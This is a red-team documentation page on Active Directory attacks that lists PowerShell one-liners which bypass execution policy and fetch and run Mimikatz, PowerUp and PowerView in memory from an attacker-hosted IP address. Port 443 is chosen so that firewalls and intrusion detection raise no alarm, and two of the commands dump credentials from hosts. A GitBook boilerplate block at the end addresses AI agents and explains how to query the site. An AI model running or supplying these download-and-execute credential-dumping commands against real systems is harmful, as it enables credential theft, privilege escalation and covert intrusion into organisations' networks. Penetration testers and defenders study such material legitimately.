> For the complete documentation index, see [llms.txt](https://docs.particle42.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.particle42.com/active-directory/all-commands-tools-and-scripts/important-scripts-and-links.md). # Important Scripts & Links These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is a major overlap with the previous section, however the major difference here is that this is simply a list of scripts along with their usage and commands (if required). On the other hand, the previous section is based out of need/requirement and the best script/command that can be useful. The heading to the tool gives a gist of its use and the section contains 2 parts, * Link to download the script * Command to download the script locally and execute it from memory I have following the method of downloading the scripts to a local repo and then using them in the powershell command to download & execute since the targetted machines may not have internet. I have also used 443 in the http link since I use either 80/443 for all such activities to avoid any alarms the firewall/IPS may raise. You can change it to the port from which you host the scripts. ## Scripts

Invoke-MassMimikatz.ps1 # Dump Credentials on remote host

``` powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose" ```

Invoke-Mimikatz.ps1 # Dump Credentials from Memory

``` powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" ```

PowerUp.ps1 #Privilege Escalation Checks

``` powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.119.208:443/PowerUp.ps1’);Invoke-AllChecks” ```

PowerView.ps1 #Network & AD Exploration

``` powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/powerview.ps1')" ``` Read more about the commands,

## Links {% embed url="" %} {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://docs.particle42.com/active-directory/all-commands-tools-and-scripts/important-scripts-and-links.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.